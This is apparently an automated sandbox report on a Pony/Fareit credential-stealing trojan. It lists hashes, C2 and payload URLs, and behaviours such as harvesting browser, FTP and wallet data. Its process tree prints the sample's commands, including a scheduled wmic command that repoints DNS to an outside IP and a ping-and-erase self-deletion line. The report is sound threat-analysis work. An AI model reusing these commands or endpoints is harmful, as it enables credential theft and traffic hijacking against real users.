Analysis

  • max time kernel
    91s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/11/2022, 08:34

General

  • Target

    66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe

  • Size

    81KB

  • MD5

    1535bd3f07b9163e3f8c1105318e4fa0

  • SHA1

    bd6a3c48c57af869ab047d677b2e12623da2b2cf

  • SHA256

    66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c

  • SHA512

    d7388ec2678bc18ba54b580611898d7d7f433c7396d6bd81f51aeabfc53e530b1826593554204def38f1242c301badc5d064d9e61451d1b52fffe48572b7c5d5

  • SSDEEP

    1536:BpAe/akMDYbcHmCPEY1Bh6OGYtl2ajXLB0M/3kIhG496yUBx7Vx1Q:BpAe/akMlmXYfgXYtxDmk3dhp2x7zy

Malware Config

Extracted

Family

pony

C2

http://voladex.pw:36/fix/mark.php

http://bolakes.pw:36/fix/refer.php

http://camtest33.pw:36/fix/symbols.php

Attributes
  • payload_url

    http://camtest3.pw:36/fix/Sonar.exe

Signatures

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
    "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:988
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 308
      2⤵
      • Program crash
      PID:3888
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 328
      2⤵
      • Program crash
      PID:2276
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 336
      2⤵
      • Program crash
      PID:4528
    • C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe
      "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"
      2⤵
      • Checks computer location settings
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1872
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c at 09:37:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4576
        • C:\Windows\SysWOW64\at.exe
          at 09:37:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.203", "8.8.8.8")
          4⤵
            PID:2288
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c ping -n 10 localhost && erase "C:\Users\Admin\AppData\Local\Temp\66bbb2e124048686d43b228b95f972bb760eb04c44bde9f43234f47152673d4c.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3672
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 10 localhost
            4⤵
            • Runs ping.exe
            PID:2284
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 320
        2⤵
        • Program crash
        PID:2496
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 988 -ip 988
      1⤵
        PID:2424
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 988 -ip 988
        1⤵
          PID:960
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 988 -ip 988
          1⤵
            PID:4620
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 988 -ip 988
            1⤵
              PID:4552

            Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • memory/988-132-0x0000000000400000-0x0000000000417000-memory.dmp

                    Filesize

                    92KB

                  • memory/988-140-0x0000000000400000-0x0000000000417000-memory.dmp

                    Filesize

                    92KB

                  • memory/1872-135-0x0000000000400000-0x0000000000418000-memory.dmp

                    Filesize

                    96KB

                  • memory/1872-134-0x0000000000400000-0x0000000000418000-memory.dmp

                    Filesize

                    96KB

                  • memory/1872-136-0x0000000000400000-0x0000000000418000-memory.dmp

                    Filesize

                    96KB

                  • memory/1872-139-0x0000000000400000-0x0000000000418000-memory.dmp

                    Filesize

                    96KB

                  • memory/1872-141-0x0000000000400000-0x0000000000418000-memory.dmp

                    Filesize

                    96KB

                  • memory/1872-146-0x0000000000400000-0x0000000000418000-memory.dmp

                    Filesize

                    96KB